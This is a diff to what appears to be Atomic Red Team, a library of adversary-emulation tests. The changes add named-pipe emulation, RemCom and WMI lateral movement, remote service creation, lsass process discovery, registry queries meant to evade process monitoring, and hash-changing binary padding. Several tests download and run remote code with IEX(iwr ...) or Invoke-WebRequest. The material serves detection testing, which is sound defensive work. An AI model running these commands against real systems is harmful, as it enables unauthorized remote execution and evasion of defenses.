+          Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+      executor:
+        command: '"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe
+          2
+
+          '
+        name: command_prompt
+    - name: Cobalt Strike SSH (postex_ssh) pipe
+      auto_generated_guid: d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6
+      description: |
+        Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+        The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Named pipe executors must exist on disk
+
+          '
+        prereq_command: 'if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe))
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+          $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+          Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+      executor:
+        command: '"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe
+          3
+
+          '
+        name: command_prompt
+    - name: Cobalt Strike post-exploitation pipe (4.2 and later)
+      auto_generated_guid: 7a48f482-246f-4aeb-9837-21c271ebf244
+      description: |
+        Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+        The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Named pipe executors must exist on disk
+
+          '
+        prereq_command: 'if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe))
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+          $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+          Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+      executor:
+        command: '"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe
+          4
+
+          '
+        name: command_prompt
+    - name: Cobalt Strike post-exploitation pipe (before 4.2)
+      auto_generated_guid: 8dbfc15c-527b-4ab0-a272-019f469d367f
+      description: |
+        Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+        The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Named pipe executors must exist on disk
+
+          '
+        prereq_command: 'if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe))
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+          $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+          Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+      executor:
+        command: '"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe
+          5
+
+          '
+        name: command_prompt
   T1204.003:
     technique:
       x_mitre_platforms:
@@ -43373,6 +43634,49 @@ execution:
           \ncmd.exe /c \"fsutil behavior set SymlinkEvaluation R2R:0\"\nrm $env:temp\\psexec.exe\n"
         name: powershell
         elevation_required: true
+    - name: Use RemCom to execute a command on a remote host
+      auto_generated_guid: a5d8cdeb-be90-43a9-8b26-cc618deac1e0
+      description: |
+        Requires having RemCom installed, path to RemCom is one of the input input_arguments
+        Will start a process on a remote host.
+        Upon successful execution, cmd will utilize RemCom.exe to spawn calc.exe on a remote endpoint (default:localhost).
+      supported_platforms:
+      - windows
+      input_arguments:
+        remote_host:
+          description: Remote hostname or IP address
+          type: string
+          default: localhost
+        user_name:
+          description: Username
+          type: string
+          default: Administrator
+        password:
+          description: Password
+          type: string
+          default: P@ssw0rd1
+        remcom_exe:
+          description: Path to RemCom
+          type: string
+          default: "$pathtoatomicsfolder\\T1569.002\\bin\\remcom.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'RemCom tool must exist on disk at specified location (#{remcom_exe})
+
+          '
+        prereq_command: 'if (Test-Path "#{remcom_exe}") { exit 0} else { exit 1}
+
+          '
+        get_prereq_command: 'Invoke-WebRequest "https://github.com/kavika13/RemCom/raw/master/bin/Release/RemCom.exe"
+          -OutFile "#{remcom_exe}"
+
+          '
+      executor:
+        command: '"#{remcom_exe}" \\#{remote_host} /user:#{user_name} /pwd:#{password}
+          cmd.exe
+
+          '
+        name: command_prompt
   T1053.002:
     technique:
       x_mitre_platforms:
@@ -46178,6 +46482,54 @@ persistence:
           reg delete "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /f
         name: command_prompt
         elevation_required: true
+    - name: Remote Service Installation CMD
+      auto_generated_guid: fb4151a2-db33-4f8c-b7f8-78ea8790f961
+      description: |
+        Download an executable from github and start it as a service on a remote endpoint
+        Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout.
+      supported_platforms:
+      - windows
+      input_arguments:
+        binary_path:
+          description: Name of the service binary, include path.
+          type: path
+          default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe
+        service_type:
+          description: Type of service. May be own,share,interact,kernel,filesys,rec,userown,usershare
+          type: String
+          default: Own
+        startup_type:
+          description: Service start method. May be boot,system,auto,demand,disabled,delayed-auto
+          type: String
+          default: auto
+        service_name:
+          description: Name of the Service
+          type: string
+          default: AtomicTestService_CMD
+        remote_host:
+          description: Name of the remote endpoint
+          type: string
+          default: localhost
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Service binary must exist on disk at specified location (#{binary_path})
+
+          '
+        prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: |
+          sc.exe \\#{remote_host} create #{service_name} binPath= #{binary_path} start=#{startup_type} type=#{service_type}
+          sc.exe \\#{remote_host} start #{service_name}
+        cleanup_command: |-
+          sc.exe \\#{remote_host} stop #{service_name} >nul 2>&1
+          sc.exe \\#{remote_host} delete #{service_name} >nul 2>&1
   T1053.003:
     technique:
       x_mitre_platforms:
@@ -54956,6 +55308,49 @@ persistence:
         cleanup_command: Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command
           Processor" -Name "AutoRun" -ErrorAction Ignore
         name: powershell
+    - name: WMI Invoke-CimMethod Start Process
+      auto_generated_guid: adae83d3-0df6-45e7-b2c3-575f91584577
+      description: |
+        The following Atomic will create a New-CimSession on a remote endpoint and start a process usnig Invoke-CimMethod.
+        This is a novel way to perform lateral movement or to start a remote process.
+        This does require WinRM to be enabled. The account performing the run will also need to be elevated.
+        A successful execution will stdout that the process started. On the remote endpoint, wmiprvse.exe will spawn the given process.
+      supported_platforms:
+      - windows
+      input_arguments:
+        dest:
+          description: destination computer name
+          type: string
+          default: localhost
+        password:
+          description: password for account
+          type: string
+          default: P@ssword1
+        username:
+          description: account to use
+          type: string
+          default: Administrator
+        process:
+          description: process to spawn
+          type: string
+          default: calc.exe
+      executor:
+        name: powershell
+        elevation_required: true
+        command: "# Set the remote computer name and credentials\n $RemoteComputer
+          = \"#{dest}\"\n $PWord = ConvertTo-SecureString -String \"#{password}\"
+          -AsPlainText -Force\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential
+          -ArgumentList \"#{username}\", $Pword\n\n # Create a CIM session\n $CimSession
+          = New-CimSession -ComputerName $RemoteComputer -Credential $Credential\n\n
+          # Define the process you want to start\n $ProcessToStart = \"#{process}\"\n\n
+          # Invoke the Create method on the Win32_Process class to start the process\n
+          $Result = Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process
+          -MethodName Create -Arguments @{CommandLine = $ProcessToStart}\n\n # Check
+          the result\n if ($Result.ReturnValue -eq 0) {\n     Write-Host \"Process
+          started successfully with Process ID: $($Result.ProcessId)\"\n } else {\n
+          \    Write-Host \"Failed to start the process. Error code: $($Result.ReturnValue)\"\n
+          }\n\n # Clean up the CIM session\n Remove-CimSession -CimSession $CimSession
+          \n"
   T1546.004:
     technique:
       x_mitre_platforms:
@@ -73560,6 +73955,36 @@ discovery:
           -FilePath .\\CurrentUserObject.txt\n"
         cleanup_command: 'Remove-Item -Path .\CurrentUserObject.txt -Force
 
+          '
+        name: powershell
+    - name: System Discovery - SocGholish whoami
+      auto_generated_guid: 3d257a03-eb80-41c5-b744-bb37ac7f65c7
+      description: "SocGholish performs whoami discovery commands and outputs the
+        results to a tmp file. \nThe test will generate a filename similar to the
+        random one generated during execution and write the file to AppData\\Temp.\n\nReference:
+        https://redcanary.com/threat-detection-report/threats/socgholish/\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        output_path:
+          description: Location of output file
+          type: string
+          default: "$env:temp"
+      executor:
+        command: |
+          $TokenSet = @{
+            U = [Char[]]'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
+            N = [Char[]]'0123456789'
+          }
+          $Upper = Get-Random -Count 5 -InputObject $TokenSet.U
+          $Number = Get-Random -Count 5 -InputObject $TokenSet.N
+          $StringSet = $Upper + $Number
+          $rad = (Get-Random -Count 5 -InputObject $StringSet) -join ''
+          $file = "rad" + $rad + ".tmp"
+
+          whoami.exe /all >> #{output_path}\$file
+        cleanup_command: 'Remove-Item -Path #{output_path}\rad*.tmp -Force
+
           '
         name: powershell
   T1613:
@@ -74360,19 +74785,13 @@ discovery:
         code 4776 from the domain controller and stores the ouput in C:\\temp. [Reference](https://www.reliaquest.com/blog/socgholish-fakeupdates/)\n"
       supported_platforms:
       - windows
-      input_arguments:
-        Domain:
-          description: Domain that is being tested against
-          type: string
-          default: "$env:USERDOMAIN"
-        DomainController:
-          description: Domain Controller that is being tested against
-          type: string
-          default: "$env:UserDnsDomain"
       executor:
-        command: wmic /node:$env:UserDnsDomain process call create 'wevtutil epl Security
-          C:\Temp\ntlmusers.evtx /q:Event[System[(EventID=4776)]]'
-        cleanup_command: 'Remove-Item C:\Temp\ntlmusers.evtx
+        command: |-
+          $target = $env:LOGONSERVER
+          $target = $target.Trim("\\")
+          $IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
+          wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
+        cleanup_command: 'Remove-Item -Path \\$IpAddress\c$\ntlmusers.evtx
 
           '
         name: powershell
@@ -77325,6 +77744,24 @@ discovery:
       executor:
         command: 'wmic process get /format:list
 
+          '
+        name: command_prompt
+    - name: Discover Specific Process - tasklist
+      auto_generated_guid: 11ba69ee-902e-4a0f-b3b6-418aed7d7ddb
+      description: "Adversaries may use command line tools to discover specific processes
+        in preparation of further attacks. \nExamples of this could be discovering
+        the PID of lsass.exe to dump its memory or discovering whether specific security
+        processes (e.g. AV or EDR) are running.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        process_to_enumerate:
+          description: Process name string to search for.
+          type: string
+          default: lsass
+      executor:
+        command: 'tasklist | findstr #{process_to_enumerate}
+
           '
         name: command_prompt
   T1497.002:
@@ -77869,8 +78306,45 @@ discovery:
           reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
           reg query HKLM\system\currentcontrolset\services /s | findstr ImagePath 2>nul | findstr /Ri ".*\.sys$"
           reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
+          reg query HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot
+          reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components"
+          reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup"
         name: command_prompt
         elevation_required: true
+    - name: Query Registry with Powershell cmdlets
+      auto_generated_guid: 0434d081-bb32-42ce-bcbb-3548e4f2628f
+      description: "Query Windows Registry with Powershell cmdlets, i.e., Get-Item
+        and Get-ChildItem. The results from above can also be achieved with Get-Item
+        and Get-ChildItem.\nUnlike using \"reg query\" which then executes reg.exe,
+        using cmdlets won't generate new processes, which may evade detection systems
+        monitoring process generation. \n"
+      supported_platforms:
+      - windows
+      executor:
+        command: "Get-Item -Path \"HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\"\nGet-ChildItem
+          -Path \"HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\\" | findstr
+          Windows\nGet-Item -Path \"HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"\nGet-Item
+          -Path \"HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"\nGet-Item
+          -Path \"HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"\nGet-Item
+          -Path \"HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"\nGet-Item
+          -Path \"HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\"\nGet-Item
+          -Path \"HKLM:Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit\"\nGet-Item
+          -Path \"HKCU:Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"\nGet-Item
+          -Path \"HKLM:Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"\nGet-Item
+          -Path \"HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad\"\nGet-Item
+          -Path \"HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"\nGet-Item
+          -Path \"HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\"\nGet-Item
+          -Path \"HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\Run\"\nGet-Item
+          -Path \"HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Run\"\nGet-Item
+          -Path \"HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"\nGet-Item
+          -Path \"HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\"\nGet-Item
+          -Path \"HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\"\nGet-ChildItem
+          -Path \"HKLM:system\\currentcontrolset\\services\" \nGet-Item -Path \"HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\Run\"\nGet-Item
+          -Path \"HKLM:SYSTEM\\CurrentControlSet\\Control\\SafeBoot\"\nGet-ChildItem
+          -Path \"HKLM:SOFTWARE\\Microsoft\\Active Setup\\Installed Components\"\nGet-ChildItem
+          -Path \"HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\Scripts\\Startup\"\n"
+        name: powershell
+        elevation_required: true
     - name: Enumerate COM Objects in Registry with Powershell
       auto_generated_guid: 0d80d088-a84c-4353-af1a-fc8b439f1564
       description: "This test is designed to enumerate the COM objects listed in HKCR,

atomics/T1012/T1012.md

@@ -8,7 +8,9 @@ The Registry contains a significant amount of information about the operating sy
 
 - [Atomic Test #1 - Query Registry](#atomic-test-1---query-registry)
 
-- [Atomic Test #2 - Enumerate COM Objects in Registry with Powershell](#atomic-test-2---enumerate-com-objects-in-registry-with-powershell)
+- [Atomic Test #2 - Query Registry with Powershell cmdlets](#atomic-test-2---query-registry-with-powershell-cmdlets)
+
+- [Atomic Test #3 - Enumerate COM Objects in Registry with Powershell](#atomic-test-3---enumerate-com-objects-in-registry-with-powershell)
 
 
 <br/>
@@ -55,6 +57,9 @@ reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
 reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
 reg query HKLM\system\currentcontrolset\services /s | findstr ImagePath 2>nul | findstr /Ri ".*\.sys$"
 reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
+reg query HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot
+reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components"
+reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup"
 ```
 
 
@@ -65,7 +70,58 @@ reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
 <br/>
 <br/>
 
-## Atomic Test #2 - Enumerate COM Objects in Registry with Powershell
+## Atomic Test #2 - Query Registry with Powershell cmdlets
+Query Windows Registry with Powershell cmdlets, i.e., Get-Item and Get-ChildItem. The results from above can also be achieved with Get-Item and Get-ChildItem.
+Unlike using "reg query" which then executes reg.exe, using cmdlets won't generate new processes, which may evade detection systems monitoring process generation.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 0434d081-bb32-42ce-bcbb-3548e4f2628f
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+Get-Item -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
+Get-ChildItem -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\" | findstr Windows
+Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"
+Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"
+Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\RunServices"
+Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\RunServices"
+Get-Item -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
+Get-Item -Path "HKLM:Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"
+Get-Item -Path "HKCU:Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
+Get-Item -Path "HKLM:Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
+Get-Item -Path "HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"
+Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\RunOnce"
+Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\RunOnceEx"
+Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Run"
+Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\Run"
+Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\RunOnce"
+Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
+Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
+Get-ChildItem -Path "HKLM:system\currentcontrolset\services" 
+Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Run"
+Get-Item -Path "HKLM:SYSTEM\CurrentControlSet\Control\SafeBoot"
+Get-ChildItem -Path "HKLM:SOFTWARE\Microsoft\Active Setup\Installed Components"
+Get-ChildItem -Path "HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup"
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - Enumerate COM Objects in Registry with Powershell
 This test is designed to enumerate the COM objects listed in HKCR, then output their methods and CLSIDs to a text file.
 An adversary could then use this information to identify COM objects that might be vulnerable to abuse, such as using them to spawn arbitrary processes. 
 See: https://www.mandiant.com/resources/hunting-com-objects

atomics/T1012/T1012.yaml

@@ -34,8 +34,45 @@ atomic_tests:
       reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
       reg query HKLM\system\currentcontrolset\services /s | findstr ImagePath 2>nul | findstr /Ri ".*\.sys$"
       reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
+      reg query HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot
+      reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components"
+      reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup"
     name: command_prompt
     elevation_required: true
+- name: Query Registry with Powershell cmdlets
+  auto_generated_guid: 0434d081-bb32-42ce-bcbb-3548e4f2628f
+  description: |
+    Query Windows Registry with Powershell cmdlets, i.e., Get-Item and Get-ChildItem. The results from above can also be achieved with Get-Item and Get-ChildItem.
+    Unlike using "reg query" which then executes reg.exe, using cmdlets won't generate new processes, which may evade detection systems monitoring process generation. 
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      Get-Item -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
+      Get-ChildItem -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\" | findstr Windows
+      Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"
+      Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"
+      Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\RunServices"
+      Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\RunServices"
+      Get-Item -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
+      Get-Item -Path "HKLM:Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"
+      Get-Item -Path "HKCU:Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
+      Get-Item -Path "HKLM:Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
+      Get-Item -Path "HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"
+      Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\RunOnce"
+      Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\RunOnceEx"
+      Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Run"
+      Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\Run"
+      Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\RunOnce"
+      Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
+      Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
+      Get-ChildItem -Path "HKLM:system\currentcontrolset\services" 
+      Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Run"
+      Get-Item -Path "HKLM:SYSTEM\CurrentControlSet\Control\SafeBoot"
+      Get-ChildItem -Path "HKLM:SOFTWARE\Microsoft\Active Setup\Installed Components"
+      Get-ChildItem -Path "HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup"
+    name: powershell
+    elevation_required: true
 - name: Enumerate COM Objects in Registry with Powershell
   auto_generated_guid: 0d80d088-a84c-4353-af1a-fc8b439f1564
   description: |-

atomics/T1027.001/T1027.001.md

@@ -8,11 +8,13 @@ Binary padding effectively changes the checksum of the file and can also be used
 
 - [Atomic Test #1 - Pad Binary to Change Hash - Linux/macOS dd](#atomic-test-1---pad-binary-to-change-hash---linuxmacos-dd)
 
+- [Atomic Test #2 - Pad Binary to Change Hash using truncate command - Linux/macOS](#atomic-test-2---pad-binary-to-change-hash-using-truncate-command---linuxmacos)
+
 
 <br/>
 
 ## Atomic Test #1 - Pad Binary to Change Hash - Linux/macOS dd
-Uses dd to add a zero to the binary to change the hash.
+Uses dd to add a zero byte, high-quality random data, and low-quality random data to the binary to change the hash.
 
 Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change.
 
@@ -35,7 +37,60 @@ Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expe
 
 
 ```sh
-dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
+dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} #adds null bytes
+dd if=/dev/random bs=1 count=1 >> #{file_to_pad} #adds high-quality random data
+dd if=/dev/urandom bs=1 count=1 >> #{file_to_pad} #adds low-quality random data
+```
+
+#### Cleanup Commands:
+```sh
+rm #{file_to_pad}
+```
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: The binary must exist on disk at specified location (#{file_to_pad})
+##### Check Prereq Commands:
+```bash
+if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```bash
+cp /bin/ls #{file_to_pad}
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - Pad Binary to Change Hash using truncate command - Linux/macOS
+Uses truncate to add a byte to the binary to change the hash.
+
+Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change.
+
+**Supported Platforms:** macOS, Linux
+
+
+**auto_generated_guid:** e22a9e89-69c7-410f-a473-e6c212cd2292
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| file_to_pad | Path of binary to be padded | path | /tmp/evil-binary|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+truncate -s +1 #{file_to_pad} #adds a byte to the file size
 ```
 
 #### Cleanup Commands:

atomics/T1027.001/T1027.001.yaml

@@ -4,7 +4,7 @@ atomic_tests:
 - name: Pad Binary to Change Hash - Linux/macOS dd
   auto_generated_guid: ffe2346c-abd5-4b45-a713-bf5f1ebd573a
   description: |
-    Uses dd to add a zero to the binary to change the hash.
+    Uses dd to add a zero byte, high-quality random data, and low-quality random data to the binary to change the hash.
 
     Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change.
   supported_platforms:
@@ -25,7 +25,38 @@ atomic_tests:
       cp /bin/ls #{file_to_pad}
   executor:
     command: |
-      dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
+      dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} #adds null bytes
+      dd if=/dev/random bs=1 count=1 >> #{file_to_pad} #adds high-quality random data
+      dd if=/dev/urandom bs=1 count=1 >> #{file_to_pad} #adds low-quality random data
+    cleanup_command: |
+      rm #{file_to_pad}
+    name: sh
+    
+- name: Pad Binary to Change Hash using truncate command - Linux/macOS
+  auto_generated_guid: e22a9e89-69c7-410f-a473-e6c212cd2292
+  description: |
+    Uses truncate to add a byte to the binary to change the hash.
+
+    Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change.
+  supported_platforms:
+  - macos
+  - linux
+  input_arguments:
+    file_to_pad:
+      description: Path of binary to be padded
+      type: path
+      default: /tmp/evil-binary
+  dependency_executor_name: bash
+  dependencies:
+  - description: |
+      The binary must exist on disk at specified location (#{file_to_pad})
+    prereq_command: |
+      if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi;
+    get_prereq_command: |
+      cp /bin/ls #{file_to_pad}
+  executor:
+    command: |
+      truncate -s +1 #{file_to_pad} #adds a byte to the file size
     cleanup_command: |
       rm #{file_to_pad}
     name: sh

atomics/T1033/T1033.md

@@ -16,6 +16,8 @@ Various utilities and commands may acquire this information, including <code>who
 
 - [Atomic Test #5 - GetCurrent User with PowerShell Script](#atomic-test-5---getcurrent-user-with-powershell-script)
 
+- [Atomic Test #6 - System Discovery - SocGholish whoami](#atomic-test-6---system-discovery---socgholish-whoami)
+
 
 <br/>
 
@@ -185,4 +187,54 @@ Remove-Item -Path .\CurrentUserObject.txt -Force
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #6 - System Discovery - SocGholish whoami
+SocGholish performs whoami discovery commands and outputs the results to a tmp file. 
+The test will generate a filename similar to the random one generated during execution and write the file to AppData\Temp.
+
+Reference: https://redcanary.com/threat-detection-report/threats/socgholish/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 3d257a03-eb80-41c5-b744-bb37ac7f65c7
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_path | Location of output file | string | $env:temp|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
